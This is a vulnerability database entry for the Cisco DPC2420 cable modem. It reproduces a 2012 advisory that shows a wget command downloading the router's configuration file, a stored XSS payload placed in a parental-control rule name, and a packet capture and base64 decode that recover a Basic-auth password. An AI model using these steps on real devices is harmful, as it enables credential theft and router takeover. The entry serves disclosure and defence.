VAR-201212-0355
Vulnerability from variot - Updated: 2022-05-17 02:08Because the WEB interface authentication type is auth-basic, an attacker can obtain router login authentication credentials through ARP poison attack. The router's WEB management and configuration interfaces have input validation issues. Validated legitimate users can inject script code and obtain sensitive information. The Cisco DPC2420 is a cable modem device. A security vulnerability exists in the Cisco DPC2420. Some ISPs allow the router configuration to be changed over the TCP 8080 port. If the remote configuration option is enabled and the port is not filtered, an attacker can download the configuration file. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and to view sensitive local files in the context of the application, which may aid in further attacks. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
-> Title: DPC2420 Multiple vulnerabilities
-> Author: Facundo M. de la Cruz (tty0)
-> E-mail: fmdlc@code4life.com.ar
[0x00]> Details
Vendor : Cisco Model : DPC2420 type : Cablemodem router. For example:
$ wget http://foobar:8080/filename.gwc -O filename.gwc - --2012-12-08 21:24:43-- http://foobar:8080/filename.gwc Connecting to foobar:8080... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [application/octet-stream Content-transfer-encoding: binary] Saving to: “filename.gwc”
[ <=> ] 15,927 50.9K/s in 0.3s
2012-12-08 21:24:43 (50.9 KB/s) - “filename.gwc” saved [15927]
$ head -n 10 filename.gwc CRCVALUE=4144540802;
<>
Version=1.1; Created Date=2012/12/8; Created Time=21:24:43; Model Number=DPC2420; Serial Number=234905123; User Password=ky3gUCBmdwbaviPW5GxMZ8vdgzHjvS3wKfdF2Lhbdwq+S6qn+1fvgs54YBwl0jX2glgaQuXx27Eo3FgAz5E1N7bk9yR 7hDbzGS+y7XY4jJjY5yin5SkqAQp9GJl/sZO4t4D7TJzy2oV43flEwmdIPkyJC74zTOYZhb24ULJz3HV6ci5wn3gMPi0rSTkUc3pzHdiK WMMAsuMrYBi5MU9yqZ1vhCfC/c2Is1xgU1Kq0Y1Wcn2LdmRFU6+7rjRuN6iisAQZRQcF/kiym5VewYRBbnRNKjMXC0fw+M9y4V7Y8S4B6 3XuEwcq3OPUSLWKaA6yPDN5e5ZNxwJJuxldirDXBg==; [---OUTPUT OMITTED FOR SPACE REASONS---]
[0x02]> - Persistent XSS
With a valid user in the router web interface for managment and configuration, a user could insert JavaScript code in this forms and make a XSS, for example add a parental rule called "'/>alert(1). Then the attacker could get the Base64 encoded password and convert it to plain text easily.
20:58:47.879985 IP 172.16.1.242.34464 > 192.168.0.1.http: Flags [P.], seq 0:372, ack 1, win 115
0x0000: 4500 01a8 fdf4 4000 4006 ccaf ac10 01f2 E.....@.@.......
0x0010: c0a8 0001 86a0 0050 e4cf 13e5 76c7 819e .......P....v...
0x0020: 8018 0073 03c2 0000 0101 080a 055f ee19 ...s........._..
0x0030: 0000 be7e 4745 5420 2f73 6967 6e61 6c2e ...~GET./signal.
0x0040: 6173 7020 4854 5450 2f31 2e31 0d0a 486f asp.HTTP/1.1..Ho
0x0050: 7374 3a20 3139 322e 3136 382e 302e 310d st:.192.168.0.1.
0x0060: 0a55 7365 722d 4167 656e 743a 204d 6f7a .User-Agent:.Moz
0x0070: 696c 6c61 2f35 2e30 2028 5831 313b 204c illa/5.0.(X11;.L
0x0080: 696e 7578 2078 3836 5f36 343b 2072 763a inux.x86_64;.rv:
0x0090: 3136 2e30 2920 4765 636b 6f2f 3230 3130 16.0).Gecko/2010
0x00a0: 3031 3031 2046 6972 6566 6f78 2f31 362e 0101.Firefox/16.
0x00b0: 300d 0a41 6363 6570 743a 2074 6578 742f 0..Accept:.text/
0x00c0: 6874 6d6c 2c61 7070 6c69 6361 7469 6f6e html,application
0x00d0: 2f78 6874 6d6c 2b78 6d6c 2c61 7070 6c69 /xhtml+xml,appli
0x00e0: 6361 7469 6f6e 2f78 6d6c 3b71 3d30 2e39 cation/xml;q=0.9
0x00f0: 2c2a 2f2a 3b71 3d30 2e38 0d0a 4163 6365 ,*/*;q=0.8..Acce
0x0100: 7074 2d4c 616e 6775 6167 653a 2065 6e2d pt-Language:.en-
0x0110: 5553 2c65 6e3b 713d 302e 350d 0a41 6363 US,en;q=0.5..Acc
0x0120: 6570 742d 456e 636f 6469 6e67 3a20 677a ept-Encoding:.gz
0x0130: 6970 2c20 6465 666c 6174 650d 0a43 6f6e ip,.deflate..Con
0x0140: 6e65 6374 696f 6e3a 206b 6565 702d 616c nection:.keep-al
0x0150: 6976 650d 0a52 6566 6572 6572 3a20 6874 ive..Referer:.ht
0x0160: 7470 3a2f 2f31 3932 2e31 3638 2e30 2e31 tp://192.168.0.1
0x0170: 2f77 6562 7374 6172 2e68 746d 6c0d 0a41 /webstar.html..A
0x0180: 7574 686f 7269 7a61 7469 6f6e 3a20 4261 uthorization:.Ba
0x0190: 7369 6320 4f6b 4d30 626d fa38 3443 a9c0 sic.aWFtYXBhc3N3
0x01a0: 1b4e 1134 640a 054b ZAo==....
- From 0x0180 offset to the end of the packet payload the attacker could get the password encoded with Base64 and simply convert it to plain text:
$ echo aWFtYXBhc3N3ZAo== | base64 -d iamapassword
1355011796
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux)
iQIcBAEBAgAGBQJQxAwHAAoJENeXyOFXJgeJlAIP/2xUnXQ/aW+HiwLEDIdTCLsj SDGjsS0m2Mk27QGBRKMZ0mPpyrQu/ZnUYSFyemh2T6Dt2DKsTsr8VoeU/KL8aeKW f+4uRYilUviyJycQ7bBcsv+12wEkVkN31mteX4FufkVvEDtSGFr2TaKvroSPRavi dGisynfKM1OpFMdXLDjZRBnWJ5KuhMx2PAoMDSsXtap2WOqxAW4FCgiLJxuAkVjB oKVmzmITPiwi0czV7AS588e7mNPL5z+4RmA+8I/w+iktV8T5Hicjey/m64kk2rfX au0vW2sNF+BF2rhIFVa8YV3kOINm7fGTGLBp3eCILugTlc3ctj/y/+1xveRIb3nG I4Okv3X0LXqBG6rr+FnElajzfkxmifH8jjUDHxUkJHvCi3JCaK2zhzs2V901b5kM 1a/1zfk3rASAnTd1tF5gnmeu4AQuiNISj/xCAlxtkdDUtL+YBiOgpza8rEwl7gkA tvVT0kxKsQr+7SokU0rFybSz6eE+AC8u/HnhW3CJktUYpvRf4BYQdQNjBHyYoSEZ ReSaX+1eGFCXRdyTwC0y0DfxVYZQQXWGodSafBA4bFq9ZFXi1F6hJap2PA2qUiZJ /DZoyfq0VEqZBoICmcYelakMSbQ4hZbk/ewc7Z9dddh8z8vrKg/pksTJnZdCIFDC Ycn0i8x1U/9cdl5WK+9e =i5b0 -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201212-0355",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dpc2420",
"scope": null,
"trust": 1.8,
"vendor": "cisco",
"version": null
},
{
"model": "dpc2420",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-7403"
},
{
"db": "CNVD",
"id": "CNVD-2012-7402"
},
{
"db": "CNVD",
"id": "CNVD-2012-7401"
},
{
"db": "BID",
"id": "56868"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Facundo M. de la Cruz",
"sources": [
{
"db": "BID",
"id": "56868"
},
{
"db": "PACKETSTORM",
"id": "118711"
},
{
"db": "CNNVD",
"id": "CNNVD-201212-135"
}
],
"trust": 1.0
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Because the WEB interface authentication type is auth-basic, an attacker can obtain router login authentication credentials through ARP poison attack. The router\u0027s WEB management and configuration interfaces have input validation issues. Validated legitimate users can inject script code and obtain sensitive information. The Cisco DPC2420 is a cable modem device. A security vulnerability exists in the Cisco DPC2420. Some ISPs allow the router configuration to be changed over the TCP 8080 port. If the remote configuration option is enabled and the port is not filtered, an attacker can download the configuration file. \nSuccessful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and to view sensitive local files in the context of the application, which may aid in further attacks. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n##\n## -\u003e Title: DPC2420 Multiple vulnerabilities\n## -\u003e Author: Facundo M. de la Cruz (tty0)\n## -\u003e E-mail: fmdlc@code4life.com.ar\n## \n\n[0x00]\u003e Details\n\n Vendor : Cisco\n Model : DPC2420\n type : Cablemodem router. For example:\n\n\n$ wget http://foobar:8080/filename.gwc -O filename.gwc \n- --2012-12-08 21:24:43-- http://foobar:8080/filename.gwc\nConnecting to foobar:8080... connected. \nHTTP request sent, awaiting response... 200 OK\nLength: unspecified [application/octet-stream Content-transfer-encoding: binary]\nSaving to: \u201cfilename.gwc\u201d\n\n [ \u003c=\u003e ] 15,927 50.9K/s in 0.3s \n\n2012-12-08 21:24:43 (50.9 KB/s) - \u201cfilename.gwc\u201d saved [15927]\n\n$ head -n 10 filename.gwc \nCRCVALUE=4144540802;\n#\u003c\u003cBegin of Configuration File\u003e\u003e\nVersion=1.1;\nCreated Date=2012/12/8;\nCreated Time=21:24:43;\nModel Number=DPC2420;\nSerial Number=234905123;\nUser Password=ky3gUCBmdwbaviPW5GxMZ8vdgzHjvS3wKfdF2Lhbdwq+S6qn+1fvgs54YBwl0jX2glgaQuXx27Eo3FgAz5E1N7bk9yR\n7hDbzGS+y7XY4jJjY5yin5SkqAQp9GJl/sZO4t4D7TJzy2oV43flEwmdIPkyJC74zTOYZhb24ULJz3HV6ci5wn3gMPi0rSTkUc3pzHdiK\nWMMAsuMrYBi5MU9yqZ1vhCfC/c2Is1xgU1Kq0Y1Wcn2LdmRFU6+7rjRuN6iisAQZRQcF/kiym5VewYRBbnRNKjMXC0fw+M9y4V7Y8S4B6\n3XuEwcq3OPUSLWKaA6yPDN5e5ZNxwJJuxldirDXBg==;\n[---OUTPUT OMITTED FOR SPACE REASONS---]\n\n[0x02]\u003e - Persistent XSS\n\nWith a valid user in the router web interface for managment and configuration, a user could insert JavaScript\ncode in this forms and make a XSS, for example add a parental rule called \"\u0027/\u003e\u003cscript\u003ealert(1)\u003c/script\u003e. \nThen the attacker could get the Base64 encoded password and convert it to plain text easily. \n\n20:58:47.879985 IP 172.16.1.242.34464 \u003e 192.168.0.1.http: Flags [P.], seq 0:372, ack 1, win 115\n\n 0x0000: 4500 01a8 fdf4 4000 4006 ccaf ac10 01f2 E.....@.@....... \n 0x0010: c0a8 0001 86a0 0050 e4cf 13e5 76c7 819e .......P....v... \n 0x0020: 8018 0073 03c2 0000 0101 080a 055f ee19 ...s........._.. \n 0x0030: 0000 be7e 4745 5420 2f73 6967 6e61 6c2e ...~GET./signal. \n 0x0040: 6173 7020 4854 5450 2f31 2e31 0d0a 486f asp.HTTP/1.1..Ho\n 0x0050: 7374 3a20 3139 322e 3136 382e 302e 310d st:.192.168.0.1. \n 0x0060: 0a55 7365 722d 4167 656e 743a 204d 6f7a .User-Agent:.Moz\n 0x0070: 696c 6c61 2f35 2e30 2028 5831 313b 204c illa/5.0.(X11;.L\n 0x0080: 696e 7578 2078 3836 5f36 343b 2072 763a inux.x86_64;.rv:\n 0x0090: 3136 2e30 2920 4765 636b 6f2f 3230 3130 16.0).Gecko/2010\n 0x00a0: 3031 3031 2046 6972 6566 6f78 2f31 362e 0101.Firefox/16. \n 0x00b0: 300d 0a41 6363 6570 743a 2074 6578 742f 0..Accept:.text/\n 0x00c0: 6874 6d6c 2c61 7070 6c69 6361 7469 6f6e html,application\n 0x00d0: 2f78 6874 6d6c 2b78 6d6c 2c61 7070 6c69 /xhtml+xml,appli\n 0x00e0: 6361 7469 6f6e 2f78 6d6c 3b71 3d30 2e39 cation/xml;q=0.9\n 0x00f0: 2c2a 2f2a 3b71 3d30 2e38 0d0a 4163 6365 ,*/*;q=0.8..Acce\n 0x0100: 7074 2d4c 616e 6775 6167 653a 2065 6e2d pt-Language:.en-\n 0x0110: 5553 2c65 6e3b 713d 302e 350d 0a41 6363 US,en;q=0.5..Acc\n 0x0120: 6570 742d 456e 636f 6469 6e67 3a20 677a ept-Encoding:.gz\n 0x0130: 6970 2c20 6465 666c 6174 650d 0a43 6f6e ip,.deflate..Con\n 0x0140: 6e65 6374 696f 6e3a 206b 6565 702d 616c nection:.keep-al\n 0x0150: 6976 650d 0a52 6566 6572 6572 3a20 6874 ive..Referer:.ht\n 0x0160: 7470 3a2f 2f31 3932 2e31 3638 2e30 2e31 tp://192.168.0.1\n 0x0170: 2f77 6562 7374 6172 2e68 746d 6c0d 0a41 /webstar.html..A\n 0x0180: 7574 686f 7269 7a61 7469 6f6e 3a20 4261 uthorization:.Ba\n 0x0190: 7369 6320 4f6b 4d30 626d fa38 3443 a9c0 sic.aWFtYXBhc3N3\n 0x01a0: 1b4e 1134 640a 054b ZAo==.... \n\n- From 0x0180 offset to the end of the packet payload the attacker could get the password \nencoded with Base64 and simply convert it to plain text:\n\n$ echo aWFtYXBhc3N3ZAo== | base64 -d\niamapassword\n\n- ---\n1355011796\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niQIcBAEBAgAGBQJQxAwHAAoJENeXyOFXJgeJlAIP/2xUnXQ/aW+HiwLEDIdTCLsj\nSDGjsS0m2Mk27QGBRKMZ0mPpyrQu/ZnUYSFyemh2T6Dt2DKsTsr8VoeU/KL8aeKW\nf+4uRYilUviyJycQ7bBcsv+12wEkVkN31mteX4FufkVvEDtSGFr2TaKvroSPRavi\ndGisynfKM1OpFMdXLDjZRBnWJ5KuhMx2PAoMDSsXtap2WOqxAW4FCgiLJxuAkVjB\noKVmzmITPiwi0czV7AS588e7mNPL5z+4RmA+8I/w+iktV8T5Hicjey/m64kk2rfX\nau0vW2sNF+BF2rhIFVa8YV3kOINm7fGTGLBp3eCILugTlc3ctj/y/+1xveRIb3nG\nI4Okv3X0LXqBG6rr+FnElajzfkxmifH8jjUDHxUkJHvCi3JCaK2zhzs2V901b5kM\n1a/1zfk3rASAnTd1tF5gnmeu4AQuiNISj/xCAlxtkdDUtL+YBiOgpza8rEwl7gkA\ntvVT0kxKsQr+7SokU0rFybSz6eE+AC8u/HnhW3CJktUYpvRf4BYQdQNjBHyYoSEZ\nReSaX+1eGFCXRdyTwC0y0DfxVYZQQXWGodSafBA4bFq9ZFXi1F6hJap2PA2qUiZJ\n/DZoyfq0VEqZBoICmcYelakMSbQ4hZbk/ewc7Z9dddh8z8vrKg/pksTJnZdCIFDC\nYcn0i8x1U/9cdl5WK+9e\n=i5b0\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-7403"
},
{
"db": "CNVD",
"id": "CNVD-2012-7402"
},
{
"db": "CNVD",
"id": "CNVD-2012-7401"
},
{
"db": "BID",
"id": "56868"
},
{
"db": "PACKETSTORM",
"id": "118711"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "56868",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "118711",
"trust": 1.9
},
{
"db": "CNVD",
"id": "CNVD-2012-7403",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2012-7402",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2012-7401",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201212-135",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-7403"
},
{
"db": "CNVD",
"id": "CNVD-2012-7402"
},
{
"db": "CNVD",
"id": "CNVD-2012-7401"
},
{
"db": "BID",
"id": "56868"
},
{
"db": "PACKETSTORM",
"id": "118711"
},
{
"db": "CNNVD",
"id": "CNNVD-201212-135"
}
]
},
"id": "VAR-201212-0355",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-7403"
},
{
"db": "CNVD",
"id": "CNVD-2012-7402"
},
{
"db": "CNVD",
"id": "CNVD-2012-7401"
}
],
"trust": 2.675
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 1.8
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-7403"
},
{
"db": "CNVD",
"id": "CNVD-2012-7402"
},
{
"db": "CNVD",
"id": "CNVD-2012-7401"
}
]
},
"last_update_date": "2022-05-17T02:08:13.936000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "http://packetstormsecurity.org/files/118711/cisco-dpc2420-cross-site-scripting-file-disclosure.html"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/56868"
},
{
"trust": 0.4,
"url": "http://www.cisco.com/web/consumer/support/modem_dpc2420.html"
},
{
"trust": 0.1,
"url": "http://foobar:8080/filename.gwc"
},
{
"trust": 0.1,
"url": "http://tty0.code4life.com.ar/cisco-dpc2420-xss.png"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/rgparentalbasic.asp"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-7403"
},
{
"db": "CNVD",
"id": "CNVD-2012-7402"
},
{
"db": "CNVD",
"id": "CNVD-2012-7401"
},
{
"db": "BID",
"id": "56868"
},
{
"db": "PACKETSTORM",
"id": "118711"
},
{
"db": "CNNVD",
"id": "CNNVD-201212-135"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2012-7403"
},
{
"db": "CNVD",
"id": "CNVD-2012-7402"
},
{
"db": "CNVD",
"id": "CNVD-2012-7401"
},
{
"db": "BID",
"id": "56868"
},
{
"db": "PACKETSTORM",
"id": "118711"
},
{
"db": "CNNVD",
"id": "CNNVD-201212-135"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-12-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-7403"
},
{
"date": "2012-12-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-7402"
},
{
"date": "2012-12-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-7401"
},
{
"date": "2012-12-09T00:00:00",
"db": "BID",
"id": "56868"
},
{
"date": "2012-12-09T23:22:22",
"db": "PACKETSTORM",
"id": "118711"
},
{
"date": "2012-12-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201212-135"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-12-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-7403"
},
{
"date": "2012-12-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-7402"
},
{
"date": "2012-12-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-7401"
},
{
"date": "2012-12-09T00:00:00",
"db": "BID",
"id": "56868"
},
{
"date": "2012-12-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201212-135"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201212-135"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cisco DPC2420 Router Login Verification Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-7403"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "56868"
}
],
"trust": 0.3
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…